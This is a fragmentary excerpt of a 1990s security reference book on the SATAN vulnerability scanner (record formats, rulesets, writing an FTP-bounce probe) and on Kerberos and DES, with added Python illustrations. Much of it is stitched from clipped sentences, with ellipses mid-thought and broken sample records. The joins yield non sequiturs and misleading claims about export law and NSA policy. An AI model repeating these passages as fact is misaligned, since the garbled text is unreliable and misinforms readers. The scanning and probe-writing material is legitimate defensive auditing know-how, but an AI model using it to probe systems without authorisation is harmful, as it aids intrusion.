• Vulnerabilities Tutorials
• Admin Guide to Cracking
The SATAN Reference provides detailed information about SATAN, the database records, and
the inference engine. … If you choose the “Vulnerabilities - a Tutorial” option from the SATAN
Documentation screen, SATAN brings up the list of these tutorials, as shown in figure 8.…

Figure 8.…

For example, if you choose the Remote Shell Access option from the Vulnerabilities screen,
SATAN brings up the Remote Shell Access screen shown in figure 8.…

Note that many of the tutorial screens, such as the one shown in figure 8.… This influential
document was written by the authors of SATAN and led to the creation of SATAN. … If you
select the Admin Guide to Cracking option from the Remote Shell Access screen, SATAN
brings up the paper, as shown in figure 8.…



Figure 8.…

Figure 8.…


Running a Scan
Follow these steps to run a scan:
1. …
2. Select the SATAN Configuration Management option and modify the settings as
   discussed previously.
3. …
4. …
5. …
6. …

You have now completed the SATAN scan. … To generate reports that help you sort this data,
choose the SATAN Reporting & Data Analysis option from the SATAN Control Panel.


Understanding the SATAN Database Record Format
There are three types of database records: facts, all-hosts, and todo. … These files are typically
in a subdirectory of satan called results/satan-data.

The facts file contains the results of vulnerability scans; each record of this file is called a fact.
… The todo file keeps track of which probes have been run against a target. … .satan script
(program) is required to output text records that are directly stored into the facts database file.
Newlines separate entries in this file. … The rulesets use PERL search capabilities to match
against records from the facts file.



Each SATAN fact consists of the following eight fields:
• Target
• Service
• Status
• Severity
• Trusted
• Trustee
• Canonical service output
• Text

Target ($target)
This is the name of the host that the record refers to. … If that fails, it uses an estimated name
or partial name.

Service ($service)
… .satan suffix removed. … .satan, this is the name of the service probed.

Severity ($severity)
… The l severity corresponds to login information gathered from rusers. … .satan … The nw
indicates that the nobody user can write files. … (Note that permissions corresponding to the
nobody user directly relate to world access settings on files.)

In general, if a hacker can modify any non-root user file, the hacker can modify executables
that the user will run, resulting in the ability of the hacker to gain execution access.


Trusted ($trusted)
This field consists of two tokens separated by an @—the left part being a user and the right
part being a host. … ) It represents an account or directory that trusts another target. … The
host part can be either the target system or ANY, but only the target system makes sense for
the Trusted field.


Trustee ($trustee)
This field represents those users and systems that are trusted by the accounts listed in the
$trusted field.


Canonical Service Output ($canonical)
For non-vulnerability records, this contains a formatted version of the information, either user
name, home dir, last login or filesys, clients.



Text ($text)
This contains messages used for reports.


Sample Fact Record
Here is an example of the output of the rpc…
…satan m2….com
m2|ftp|a|x|||ANONYMOUS|offers anon ftp
m2|ftp|a|nw|~ftp|ANY@ANY|writable FTP home directory|~ftp is writable
%

Both facts have a $target of m2, a $service of ftp, and indicate a $status of a (available). …
The $trusted and $trustee fields do not apply to the first record, but the second record indicates
that the ~ftp directory ($trusted) grants access to anyone on any other system ($trustee =
ANY@ANY). … ” Finally, the $text fields for both records describe the problem for reporting
purposes.

… .satan tools assume that they are being run with a default directory of the top-level SATAN
program, satan-1.1… … .satan tries to include config/paths… 1 … Either run these tools from
that directory, as shown in the example, or modify these tools to include absolute pathnames.
… 1 … This file will be filled with records generated by the …


Seeing All the Hosts
The all-hosts text file contains host records, which are used to keep track of hosts that SATAN
has seen, regardless of whether these hosts have been scanned by SATAN. … Newlines separate
entries in this file. … 1 …
…notreal….34….78|0|2|0|817008639
mailhub….com|12….45….notreal…


Examining All the Things It Did
The SATAN todo file contains a list of hosts, and probes that have been run against those
hosts. … The fields are as follows:
• The hostname
• The name of the tool that was run against that host
• Any arguments used by that tool during the run against that host
The best way to understand this database format is to look at the satan-1….1/results/satandata/todo
file:
m2….com|tcpscan….notreal….satan|
m2….com|rpc….notreal….satan|-d m2….com:0

Notice that the system m2….com had tcpscan…


Understanding the SATAN Rulesets
When making a scan, SATAN first examines vulnerabilities that are explicitly listed in the scan
level of the satan.… The scan level can indicate optional checks for a vulnerability by listing it
with a ?. …

For example, the light scan includes showmount.satan entry. … .satan script is run only if the
mount service is available on the target system, and this information is available as a result of
the rpc… This conditional execution can speed up the execution of SATAN by avoiding
unnecessary tests.



drop
The drop file is used to determine which facts should be ignored. … Note that cdrom directories
that are NFS-exported but are not named /cdrom are not dropped from the facts database. … The
single rule included in the drop file is
$text =~ /exports \/cdrom/i

This rule says that the record should be dropped if the $text field contains exports /cdrom,
because that is the field between the //.



facts
The facts file deduces new facts based on existing data. …

An example clarifies this structure:
/runs rexd/
	$target|assert|a|us|ANY@$target|ANY@ANY|REXD access|rexd is vulnerable

This entry indicates that if a SATAN record includes the text runs rexd, a new SATAN fact is
added (assert) to the facts file: this fact says that the $target that has a runs rexd entry (as a
result of the rpc… ) …

The remaining entries in the default SATAN facts file look for old ftpd versions, and the
existence of a modem on a TCP port. … If this problem could be detected by the banner given
by a vendor’s telnetd, this vulnerability could be detected by adding an entry into this facts
file. …
…2.4…2.4/
	$target|assert|a|uw|ANY@$target|ANY@ANY|Telnetd access|telnetd is vulnerable

This is making further assumptions about the problem that may or may not be accurate; the
example is just for illustration of the process.

hosttype
The file consists of a major section (CLASS class_name) that is just used for reporting,
followed by the real rules. …

Looking at the Ultrix CLASS of the satan-1….1/rules/hosttype, three rules are used to identify
various versions of Ultrix:
CLASS Ultrix
/ultrix[\/v ]+([…
In the first case, the $1 corresponds to the information that matches to those parts inside the
(). …

services
The file is broken into two parts: SERVERS and CLIENTS. … If that rule evaluates to true, the
second field is assumed to be provided (if under SERVER) or used (if under CLIENT). …

Here is an example from the satan-1….1/rules/services file:
/offers gopher/     Gopher
/offers http/       WWW

Notice that this services file is used by SATAN when generating a Results screen or a report.



todo
The todo file specifies probes to try based on existing facts. …

Here is an example from the satan-1….1/rules/todo file:
$service eq “ypserv”     $target “ypbind.satan”
$service eq “rexd”       $target “…”

The rules indicate that if the $service field of a record in the SATAN facts database is either
“ypserv” or “rexd”, SATAN should run either “ypbind.satan” … against the $target indicated
in that record. … If, for example, a user would find a vulnerability against the echo service, the
user could create an echo.satan …

trust
The trust file contains rules that are used by SATAN to classify hosts on the basis of trust. …

Here is an example from the satan-1….1/rules/trust file:
$text =~ / mounts \S+/        NFS export
/serves nis domain/           NIS client

The first entry indicates that if the $text field of a fact contains the word mounts followed by a
string, this system is exporting NFS file systems. …

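As an added example (not code from the book or from SATAN), the following Python parses facts records in the eight-field format shown in the Sample Fact Record section and applies one rule of each kind from the drop, facts, todo, and trust rulesets described above; the rules are Python regexes equivalent to the PERL patterns quoted, and the four records beyond the chapter's two ftp facts are constructed.

```python
import re
from dataclasses import dataclass

# The eight fields of a SATAN fact, in record order.
FIELDS = ("target", "service", "status", "severity",
          "trusted", "trustee", "canonical", "text")

@dataclass(frozen=True)
class Fact:
    target: str
    service: str
    status: str
    severity: str
    trusted: str
    trustee: str
    canonical: str
    text: str

    @classmethod
    def parse(cls, line):
        """One '|'-separated facts-file record (newline-terminated in the file)."""
        parts = line.rstrip("\n").split("|")
        if len(parts) != len(FIELDS):
            raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}: {line!r}")
        return cls(*parts)

    def record(self):
        return "|".join(getattr(self, f) for f in FIELDS)

def load_facts(text):
    """Newlines separate entries; blank lines are ignored."""
    return [Fact.parse(line) for line in text.splitlines() if line.strip()]

# The rulesets, as Python regexes equivalent to the PERL patterns quoted in
# the chapter.  SATAN evaluates the real rules with PERL; this is a re-creation.
DROP_RULES = [("text", re.compile(r"exports /cdrom", re.I))]   # rules/drop

FACTS_RULES = [   # rules/facts: pattern on $text -> record to assert
    (re.compile(r"runs rexd"),
     "$target|assert|a|us|ANY@$target|ANY@ANY|REXD access|rexd is vulnerable"),
]

TODO_RULES = [    # rules/todo: $service eq "..." -> tool to run against $target
    ("ypserv", "ypbind.satan"),
    ("echo", "echo.satan"),   # the chapter's hypothetical probe for the echo service
]

TRUST_RULES = [   # rules/trust: pattern on $text -> trust class
    (re.compile(r" mounts \S+"), "NFS export"),
    (re.compile(r"serves nis domain"), "NIS client"),
]

def apply_drop(facts):
    """Discard facts whose field matches a drop rule, before any inference."""
    return [f for f in facts
            if not any(pat.search(getattr(f, field)) for field, pat in DROP_RULES)]

def infer_facts(facts):
    """Assert new facts; '$target' in the template is the matching fact's host."""
    return [Fact.parse(template.replace("$target", f.target))
            for f in facts for pat, template in FACTS_RULES if pat.search(f.text)]

def plan_todo(facts):
    """Todo records (hostname, tool, arguments) for the probes to run next."""
    return [(f.target, tool, "") for f in facts
            for service, tool in TODO_RULES if f.service == service]

def classify_trust(facts):
    """Map each host to the trust classes its facts put it in."""
    classes = {}
    for f in facts:
        for pat, cls in TRUST_RULES:
            if pat.search(f.text):
                classes.setdefault(f.target, set()).add(cls)
    return classes

# Constructed sample: the two records from the chapter plus four invented ones
# whose $text fields exercise the drop, facts, todo and trust rules.
SAMPLE_FACTS = """\
m2|ftp|a|x|||ANONYMOUS|offers anon ftp
m2|ftp|a|nw|~ftp|ANY@ANY|writable FTP home directory|~ftp is writable
m2|rpc|a|x|||rexd|runs rexd
m2|nfs|a|x|||/cdrom|exports /cdrom to everyone
m2|ypserv|a|x|||nis|serves nis domain notreal
m2|nfs|a|x|||/home|everyone mounts /home
"""

def run_pipeline(text=SAMPLE_FACTS):
    """Drop, then infer, then derive todo entries and trust classes."""
    facts = apply_drop(load_facts(text))
    facts += infer_facts(facts)
    return {"facts": facts, "todo": plan_todo(facts), "trust": classify_trust(facts)}

if __name__ == "__main__":
    for fact in run_pipeline()["facts"]:
        print(fact.record())
```
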
Extending SATAN
A new probe can be added to SATAN by creating a new … Then the tool name must be explicitly
added to the satan…

The tool can be conditionally invoked using the rulesets, if so desired, as discussed previously,
by adding it to the satan… Finally, ruleset changes can be added, if so desired, and new
documentation describing the vulnerability and how to deal with it is a worthwhile addition.

… The goal of ftpbounce… If the remote ftpd permits a PORT command with an IP address
that is different from the originating source, and a TCP port that is reserved, the ftpd is open to
this problem. … .satan is to copy ftp.satan and make appropriate modifications. … .satan tool
must output fact records, and using the existing approach from current… ) Here is a clip from
ftp…:
foo
dele $$
…

… .satan script is ready to be listed in the heavy scan listing in satan… At this point, an HTML
document describing the fix (“Get the patch from a vendor, or the latest wu-ftpd”) should be
added into the links available on the tutorials Web page. … .satan tool and the new Web pages
should be sent to the creators of SATAN for inclusion into new versions of the program. … .com
…

… It can be written in any language as long as it takes an argument specifying the target name
and emits records that comply with the facts database format. … .satan tools are written in
PERL but call compiled programs, such as nfs-chk (which is written in C). … SATAN can be
used to assist security administrators in enforcing company policies, such as preventing
unrestricted NFS exports or X server access. … SATAN can be used to do such auditing
remotely.



Works Cited
Alighieri, Dante. … Norton Anthology of World Masterpieces, Volume 1, 4th Edition. … W…

Belgers, Walter. … win….nl/pub/security/UNIX-password-security….Z; INTERNET.

… “Security Problems in the TCP/IP Protocol Suite,” 1993, available from ftp://ftp….att….ps.

Farmer, Dan and Wietse Venema. … win….nl/pub/security/admin-guide-to-cracking….Z;
INTERNET.

… “CIAC Bulletin G-4: X Authentication Vulnerability,” 1995, available from
http://ciac….gov; INTERNET.

…, “A Taxonomy of Computer Program Security Flaws, with Examples,” Naval Research
Laboratory, NRL/FR/5542—93-9591, 1993.

… “Infowar: Can bits really replace bullets?” EE Times, Nov 6, 1995.

… “Addressing Weaknesses in the Domain Name System Protocol,” 1993, available from
ftp://coast….purdue…

U.S. Department of Defense, Trusted Computer System Evaluation Criteria, 1985a, available
from ftp://ftp….org/pub/info/orange-book…


Kerberos

… identity before using its services.

One approach is for the service to trust the authentication performed by the client system. …

Unfortunately, a workstation is under the complete control of its user. … A secure network
service cannot rely on the integrity of the workstation to perform a reliable authentication. …
It enables users communicating over networks to prove their identity to each other while
optionally preventing eavesdropping or replay attacks. … Kerberos provides real-time
authentication in an insecure distributed environment. … To solve the same problems and to
provide European companies with a compatible product, another project has been started in
Europe. …



How Kerberos Works
The Kerberos model is based on a trusted third-party authentication protocol. …

Kerberos is publicly available and has seen wide use. …

A ticket, which is a sequence of a few hundred bytes, can be embedded in virtually any
network protocol. … Although most implementations of Kerberos use TCP/IP, some
implementations use other protocols. … Data stream mechanisms, such as SOCK_STREAM or
RPC, can also use it as the implicit authentication system. …

Kerberos is only a part of a security implementation. … Kerberos provides services in the first
two areas:
• It provides mutual authentication and secure communication between principals on an
  open network. …

Using Kerberos on time-sharing machines greatly weakens its protections. … Dumb terminals
and most X terminals do not understand the Kerberos protocol. …


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

537

Kerberos

In a Kerberos system, a designated site on the network, called the Kerberos authentication
server, performs centralized key management and administrative functions. … It generates
session keys whenever two users want to communicate securely and authenticates the identity
of a user who requests secured network services. … If the server is compromised, the integrity
of the whole system fails. … Each realm has its own authentication server, and implements its
own security policy. … A realm can accept authentications from other realms or not accept
them without a re-authentication if the information security policy requires re-authentication.
… That is, each realm may have child realms, and each realm may have a parent. … If an
organization has a corporate-wide user naming policy, for example, it is possible for a user
authenticating in one Kerberos realm to connect to a computer in another realm without
requiring re-authentication. … Specifically, if an organization ABC… 9.…

If a user authenticates to the realm RESEARCH….COM and wants to use information from
PAYROLL….COM, there is no need to re-authenticate. … COM …

Figure 9.… (ABC.COM, with the Payroll and Operations realms beneath it)



On the other hand, if a user authenticates to DEF… ABC….COM before sharing information.
… If the two companies want to accept each other’s authentication, the two root Kerberos
servers ABC….COM need to share an encryption key. … .COM can authenticate as a user to
ABC…


RFCs
An RFC is a request for comment. … The RFC describes the protocol or standard the issuer
would like to see adopted. … RFC 1510, however, describes version 5 of Kerberos. … It is
available from the following:
ftp://ftp….edu/in-notes/rfc1510…


Goals of Kerberos
The design of Kerberos has goals in three areas: authentication, authorization, and accounting.
…

There is much discussion in the security industry of how particular systems fit into the
government-trusted host classification system. … It can, however, be used as a component
when building a secure network. …


Authentication
Any user can make a claim to an ID. … During basic authentication, the user is asked to
provide a password. …



Alternatively, the user can be asked to provide biometric measurements (thumbprints,
voiceprints, or retinal scans) to authenticate the claim to that ID. … This authentication server
can be physically secured, and can be controlled to ensure its reliability. …


Authorization
After a user has been authenticated, the application or network service can administrate
authorization. …

Kerberos’ goal is to provide a trusted authentication of the ID on which a system can base its
authorizations. …

Accounting
… In addition, accounting audits users’ activities to ensure that responsibility for an action can
be traced to the initiator of the action. …

Security of the accounting and auditing system is important. …

The goal of Kerberos is to permit attachment of an integrated, secure, reliable accounting
system. …


The authentication process proceeds as follows:
1. … 9.… These credentials can be directly for an application server or for a Ticket Granting
   Server. …
2. The authentication server responds with these credentials, encrypted in the client’s key
   (see fig. 9.2 [Message 2]). …
   • …
   • A temporary encryption key (called a session key) …
3. If the ticket is for a Ticket Granting Server, the client then requests a ticket for the
   application server from the Ticket Granting Server (see fig. 9.2 [Message 3]). …
4. The Ticket Granting Server replies with a ticket for the application server (see fig. 9.2
   [Message 4]). …
5. The client transmits the ticket (which contains the client’s identity and a copy of the
   session key, all encrypted in the server’s key) to the application server (see fig. 9.2
   [Message 5]). …
6. The session key, now shared by the client and application server, is used to authenticate
   the client, and can be used to authenticate the server (see fig. 9.2 [Message 6]). …

Figure 9.2 … (messages 1 through 6 among the Kerberos client, the Kerberos ticket granting
server, and the Kerberos application server)


An implementation consists of one or more authentication servers running on physically secure
hosts
...
Code libraries on the server provide encryption and implement the
Kerberos protocol
...

A client can use two methods for asking a Kerberos server for credentials
...
The reply is sent encrypted in the client’s secret key
...

s Client sends a request to the Ticket Granting Server in the same manner as when
contacting any other application server that requires Kerberos credentials
...

After credentials are obtained, they can be used to establish the level of security the application
requests:
s Verify the identity of the principals in a transaction
s Ensure the integrity of messages exchanged between them
s Preserve privacy of the messages
The application can choose whatever level of protection it deems necessary
...

To verify the identities of the principals in a transaction, the client transmits the ticket to the function server. Parts of it are encrypted, but this encryption doesn't thwart replay. So, additional information accompanies the message to prove it originated at the principal to whom the ticket was issued. The timestamp proves that the message was generated recently and is not a replay. Because no one except the requesting principal and the server knows the session key (it never travels over the network in the clear), this guarantees the identity of the client. This approach provides detection both of replay attacks and message stream modification attacks, by generating and transmitting a collision-proof checksum, called a hash or digest, of the client's message, keyed with the session key.
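The authenticator check just described, written out as an added example (it is not code from the book or from any Kerberos distribution): the client sends its identity, a timestamp, and a digest of the message keyed with the session key, and the application server checks the clock-skew window, the keyed digest, and a replay cache. HMAC over MD5 is used as the keyed collision-proof digest and 300 seconds as the skew limit; both are assumptions for the illustration, as are the session key, the principal name, and the message.

```python
import hashlib
import hmac

# Constructed session key; in Kerberos it arrives inside the ticket and is never
# sent in the clear.
SESSION_KEY = bytes.fromhex("0123456789abcdeffedcba9876543210")
MAX_CLOCK_SKEW = 300  # seconds; an assumed limit, not a value from the book


def keyed_digest(session_key: bytes, message: bytes) -> str:
    """Collision-proof digest of the message keyed with the session key.

    HMAC over MD5 stands in for the keyed checksum (an assumption; the text only
    requires a keyed, collision-proof hash of the message)."""
    return hmac.new(session_key, message, hashlib.md5).hexdigest()


def build_authenticator(client: str, session_key: bytes, message: bytes, now: float) -> dict:
    """Client side: the extra data that accompanies the ticket to prove the
    message is fresh and came from the principal holding the session key."""
    return {"client": client, "timestamp": int(now),
            "cksum": keyed_digest(session_key, message)}


class ApplicationServer:
    """Server side: timestamp window, keyed digest, and a replay cache."""

    def __init__(self, session_key: bytes, max_skew: int = MAX_CLOCK_SKEW):
        self.session_key = session_key
        self.max_skew = max_skew
        self.seen = {}  # (client, timestamp) -> timestamp, kept only within the window

    def verify(self, auth: dict, message: bytes, now: float) -> str:
        # Synchronized clocks bound the bookkeeping: anything older than the
        # skew window is rejected on timestamp alone and can leave the cache.
        self.seen = {k: t for k, t in self.seen.items() if now - t <= self.max_skew}
        if abs(now - auth["timestamp"]) > self.max_skew:
            return "rejected: timestamp outside skew window"
        expected = keyed_digest(self.session_key, message)
        if not hmac.compare_digest(expected, auth["cksum"]):
            return "rejected: checksum mismatch"
        key = (auth["client"], auth["timestamp"])
        if key in self.seen:
            return "rejected: replay"
        self.seen[key] = auth["timestamp"]
        return "accepted"


def demo():
    """Exercise the four cases a server must tell apart; returns the verdicts."""
    now = 1_000_000.0
    server = ApplicationServer(SESSION_KEY)
    msg = b"transfer 100 to account 42"  # constructed application message
    auth = build_authenticator("jsmith@ABC.COM", SESSION_KEY, msg, now)
    first = server.verify(auth, msg, now)
    replayed = server.verify(auth, msg, now + 1)   # same authenticator resent
    tampered = server.verify(auth, b"transfer 900 to account 42", now + 2)
    stale = build_authenticator("jsmith@ABC.COM", SESSION_KEY, msg, now - 3600)
    old = server.verify(stale, msg, now + 3)
    return first, replayed, tampered, old


if __name__ == "__main__":
    print(demo())
```

The replay cache only has to remember authenticators that are still inside the skew window, which is the bookkeeping saving that synchronized clocks buy; an unsynchronized client simply fails the first test.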

Privacy and integrity of the messages exchanged between principals can be secured by using the session key passed in the ticket and contained in the credentials to encrypt the data to be passed. Sometimes the entries in the database must be modified, however, such as when adding new principals or changing a principal's key. The administration protocol is not described here.


What Kerberos Doesn't Do
Kerberos doesn't solve denial of service attacks.

Detection and solution of such attacks, some of which can appear to be common failure modes for the system, usually is best left to the human administrators and users. If an intruder somehow steals a principal's key, the villain can masquerade as that principal or impersonate any server to the legitimate principal. If a user chooses a poor password, an attacker can successfully mount an off-line dictionary attack.

Kerberos is also vulnerable to clock synchronization attacks. This synchronization serves to reduce the bookkeeping needs of application servers when they perform replay detection. If the clocks are synchronized over the network, the clock synchronization protocol must itself be secured from network attackers. A typical mode of access control uses Access Control Lists to grant permissions to particular principals. The list should consist only of principal identifiers, although group identifiers are usually allowed. If the user is listed as an authorized principal, access is granted. Not reusing principal identifiers erases the danger of inadvertent access. This entire problem is referred to as object reuse.


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 angela 2-2-96 CH09 LP#4

Kerberos

Encryption
Kerberos uses encryption to protect information passing over the network.

An encryption system is a set of rules or operations to be applied to the message. The original message is called plaintext.

Note: Encryption is a procedure to convert plaintext into ciphertext, and decryption is a procedure to convert ciphertext into plaintext.

Many encryption systems have been patented, including DES and RSA. ... U.S. ... Hellman, W. ... Merkle, issued 4/29/80, and in U.S. Patent 4,218,582, by M. ... Merkle, issued 8/19/80. Public Key Partners, of Sunnyvale, California holds exclusive licensing rights to both patents, as well as the rights to the RSA patent. Any commercial implementation of Kerberos will be subject to the license granted for the encryption system.

The NSA is the U.S. government's official communications security body. The NSA is the largest employer of mathematicians and the largest purchaser of computer hardware in the world. For reasons of national security, almost all information about the NSA is classified.

As the premier cryptographic government agency, the NSA has enormous financial and computer resources.

This secrecy has led to many rumors about the NSA's capability to break popular cryptosystems like DES and that the NSA secretly has placed weaknesses, called trapdoors, in DES.



The NSA exerts influence over commercial cryptography in several ways. ... It does, however, approve for export any products used for authentication only, no matter how large the key size, as long as the product cannot be converted to be used for encryption. Additionally, the NSA serves an advisory role to NIST (National Institute of Standards and Technology, a division of the U.S. Department of Commerce) in the evaluation and selection of official U.S. government computer security standards. The NSA also can exert market pressure on U.S. companies to produce (or refrain from producing) encryption products, because the NSA itself often is a major customer for these same companies. As a result, any distribution of encryption that is legal within the U.S. is also legal into Canada.


Private, Public, Secret, or Shared Key Encryption
There is a wide range of terminology in use for only two concepts. An algorithm that depends on a key that must remain private is a secret key system. Because Kerberos shares the secret key among a small group of principals, it is often referred to as a shared secret key system. An algorithm that permits a key to be published is called a public key system.

If a system depends on a secret key, the intention clearly is to prevent usage by anyone who lacks the key.

A public key system is actually a dual key system. Anyone with the public key may encrypt a message to the holder of the private key, and be confident that only one individual has access to the message. Anyone who decrypts the message with the public part of the key can be confident that the message could only have originated from one individual.



The primary advantage of public-key cryptography is increased security. In a secret-key system, by contrast, the potential always exists for an enemy to discover the secret key during transmission. Certain popular secret-key encryption methods are significantly faster than any currently available public-key encryption methods. Although Kerberos can be implemented with a public key encryption system, the option to encrypt all data between principals leaves the potential for very large amounts of encryption to take place. With this in mind, Kerberos has been designed to handle the problem of secure distribution of secret keys.

The encryption function uses the key to generate a mapping of the plaintext into the ciphertext. Such systems, in which the same key value is used to encrypt and decrypt, also are known as symmetric cryptosystems.


DES and Its Variations
Originally developed by IBM, DES stands for Data Encryption Standard, an encryption block cipher. ... The details can be found in the official FIPS (Federal Information Processing Standards) publication.

DES is a secret-key, symmetric cryptosystem. DES was designed to be implemented in hardware and operates relatively fast (compared to other encryption systems) on 64-bit blocks with a 56-bit key.

DES has been recertified as an official U.S. government encryption standard every five years.



As far as is known, DES never has been broken with a practical attack, despite the efforts of many researchers over many years. This takes 2^55 steps on average. Wiener estimated the cost of a specialized computer to perform such an exhaustive search at one million dollars—a sum within the budget of a moderate-sized corporation, or a special interest group. These ideas have fostered doubts about the security of DES.

The consensus is that DES, used properly, is secure against all but the most powerful enemies. Biham and Shamir have stated that they consider DES secure.

One should change DES keys frequently, to prevent attacks that require sustained data analysis.

DES can be used for encryption in several officially defined modes. ... Some are more secure than others.

• ECB (Electronic Code Book). Encrypts each 64-bit block of plaintext consecutively under the same 56-bit DES key.

• CBC (Cipher Block Chaining). ... Thus, the encryption of each block depends on previous blocks and the same 64-bit plaintext block encrypts to different ciphertext, depending on its context in the overall message.

• CFB (Cipher Feedback). ... It uses the previously generated ciphertext as input to DES to create a randomizer to combine with the next block of plaintext.

• OFB (Output Feedback Mode). ... OFB is not as secure as CFB.

Software implementations in general purpose computers are not in compliance with this standard.


Encryption Export Issues
All cryptographic products need export licenses from the State Department, acting under authority of the International Traffic in Arms Regulation (ITAR). The U.S. government has historically been reluctant to grant export licenses for encryption products it sees as stronger than a certain non-publicly assigned level. Export jurisdiction then can be passed to the Department of Commerce, whose export procedures generally are simple and efficient. The NSA sometimes becomes directly involved at this point.

The NSA has de facto control over export of cryptographic products. Therefore, policy decisions concerning exporting cryptography ultimately rest with the NSA. Its concern lies only with the use of cryptography for privacy. This is true even for very strong systems, such as RSA with large key sizes. An authentication product needs NSA and State Department approval only once, whereas an encryption product could need approval for every sale or every product revision. ... The government rarely approves export of DES, although DES is widely available overseas. These products are functionally compatible with U.S. products. ...

Export policy currently is a matter of great controversy. The Software Publishers Association (SPA), a software industry group, has recently been negotiating with the government to get export license restrictions eased. Also, export policy is less restrictive for foreign subsidiaries and overseas offices of U.S. companies. The Board is an official advisory board whose members are drawn from the government and the private sector. National security and law enforcement agencies like restrictions on cryptography, especially for export, whereas other government agencies and private industry want greater freedom for using and exporting cryptography. U.S. export policy could undergo significant changes in the next few years. You can access it using the following URL: http://web ... fr/Network/Crypto/

In much of the civilized world, encryption is legal or at least tolerated. Some countries in which encryption is illegal are Russia, France, Iran, and Iraq.

Encryption is used to prove the identities of the network entities participating in message exchanges. Proof of knowledge of this secret key is used to verify the authenticity of a principal. The capability to obtain the secret key or session key implies knowing the appropriate keys and the identity of the Key Distribution Center. Likewise, the capability of the service to extract the session key from the ticket and prove its knowledge thereof in a response verifies the identity of the service.

Sometimes, though, the order of fields in the encrypted portions of messages is arranged to minimize the effects of poorly chosen keys. If keys are derived from user-typed passwords, those passwords need to be chosen well to make brute force attacks more difficult.

The following sections specify the encryption and checksum mechanisms currently defined for Kerberos and describe the encoding, chaining, and padding requirements for each. The requirements for a confounder are specified along with each encryption mechanism. These chaining methods often don't provide an integrity check upon decryption. Such checksums should be good at detecting burst errors in the input. Each encryption type is expected to provide and verify an appropriate checksum.

Finally, if a key is to be derived from a user's password, an algorithm for converting the password to a key of the appropriate type is required. An attacker compromising the Kerberos server in one realm should not be able to just obtain or derive the user's key in another realm. The encrypted field that appears in the unencrypted part of messages is a sequence that consists of an encryption type, an optional key version number, and the ciphertext:

• Encryption type. Identifies the encryption algorithm used to encrypt the cipher.

• Key version number. Contains the version number of the key under which data is encrypted. Used to determine which key to use when a ticket is valid across a change in key, such as when a user changes his password.

• Ciphertext. Contains the encrypted field(s).

Encryption mechanisms defined for use with Kerberos must take sufficient measures to guarantee the integrity of the plaintext.

The suggested format for the data to be encrypted includes a confounder, a checksum, the encoded plaintext, and any necessary padding. The format for the data to be encrypted is described in the following:

    {
        confounder[0]   BYTE STRING(conf_length) OPTIONAL,
        check[1]        BYTE STRING(checksum_length) OPTIONAL,
        msg-seq[2]      MsgSequence,
        pad             BYTE STRING(pad_length) OPTIONAL
    }

The first step is to create a confounder. Its purpose is to confuse or confound certain types of brute force attacks. Next, calculate the appropriate checksum over the confounder, the zeroed checksum, and the message. Add the necessary padding to bring the total length to a multiple of the encryption blocking length.

Unless otherwise specified, a definition of a Kerberos encryption algorithm uses this ciphertext format. Additionally, messages encoded in this format must include a length as part of the message field, to enable the recipient to verify that the message has not been truncated.
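The layout and the checks just described, as an added example rather than code from the book: frame() lays out confounder, checksum (zeroed while the checksum is computed), message sequence, and padding to the 8-byte DES blocking length, and unframe() checks the embedded length before recomputing the checksum, so a truncated, modified, or re-confounded message is rejected. MD5 is the checksum, as in des-cbc-md5; the DES CBC encryption that would wrap this framing belongs to the encryption type and is not performed here. The 4-byte big-endian length prefix and the fixed confounder used in demo() are assumptions.

```python
import hashlib
import os
import struct

BLOCK_LEN = 8    # DES blocking length
CONF_LEN = 8     # confounder length used by the DES encryption types
CKSUM_LEN = 16   # MD5 checksum length


def frame(message: bytes, confounder: bytes = None) -> bytes:
    """Lay out confounder | checksum | msg-seq | pad, ready for CBC encryption.

    The msg-seq is given a 4-byte big-endian length prefix (an assumed encoding)
    so the recipient can verify the message was not truncated."""
    if confounder is None:
        confounder = os.urandom(CONF_LEN)
    if len(confounder) != CONF_LEN:
        raise ValueError("confounder must be %d bytes" % CONF_LEN)
    msg_seq = struct.pack(">I", len(message)) + message
    # The checksum covers the confounder, a zeroed checksum field and the message.
    cksum = hashlib.md5(confounder + bytes(CKSUM_LEN) + msg_seq).digest()
    body = confounder + cksum + msg_seq
    body += bytes((-len(body)) % BLOCK_LEN)  # pad to the blocking length
    return body


def unframe(data: bytes) -> bytes:
    """Verify length and checksum, then return the message.
    Raises ValueError on any integrity failure."""
    if len(data) % BLOCK_LEN or len(data) < CONF_LEN + CKSUM_LEN + 4:
        raise ValueError("bad length")
    confounder = data[:CONF_LEN]
    received = data[CONF_LEN:CONF_LEN + CKSUM_LEN]
    rest = data[CONF_LEN + CKSUM_LEN:]
    (msg_len,) = struct.unpack(">I", rest[:4])
    if 4 + msg_len > len(rest):
        raise ValueError("message truncated")
    msg_seq = rest[:4 + msg_len]
    expected = hashlib.md5(confounder + bytes(CKSUM_LEN) + msg_seq).digest()
    if expected != received:
        raise ValueError("checksum mismatch")
    return msg_seq[4:]


def demo():
    """Round trip, then three damaged inputs; returns the outcomes in order."""
    conf = bytes(range(CONF_LEN))       # constructed fixed confounder, for reproducibility
    msg = b"ticket for jsmith@ABC.COM"  # constructed message (25 bytes)
    framed = frame(msg, conf)
    outcomes = [unframe(framed) == msg, len(framed) % BLOCK_LEN == 0]
    damaged = (
        framed[:-BLOCK_LEN],                                   # trailing block dropped
        framed[:30] + bytes([framed[30] ^ 1]) + framed[31:],   # one message byte flipped
        bytes(CONF_LEN) + framed[CONF_LEN:],                   # confounder replaced
    )
    for bad in damaged:
        try:
            unframe(bad)
            outcomes.append("accepted")
        except ValueError as err:
            outcomes.append(str(err))
    return outcomes


if __name__ == "__main__":
    print(demo())
```

Checking the length before the checksum matters: a truncated message is reported as such instead of as a checksum failure, and the checksum computation never reads past the data that was actually received.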

To enable all implementations using a particular encryption type to communicate with all others using that type, the specification of an encryption type defines any checksum needed as part of the encryption process.

Some encryption systems require additional information beyond the key and the data to be encrypted. If required, the description for each encryption type must specify the source of such additional information. The following structure shows the encoding of an encryption key:

    EncryptionKey = {
        keytype[0]     INTEGER,
        keyvalue[1]    BYTE STRING
    }

• keytype. ... It almost always corresponds to the encryption algorithm used to generate the encrypted data, though more than one algorithm may use the same type of key (the mapping is many to one).

• keyvalue. ...

All negative values for the encryption key type are reserved for local use.


Encryption Systems
Kerberos defines a number of encryption systems that may be selected for use in a message.

When a principal sends a message using an encryption method, the destination principal must also support the encryption method.

The NULL Encryption System (null)
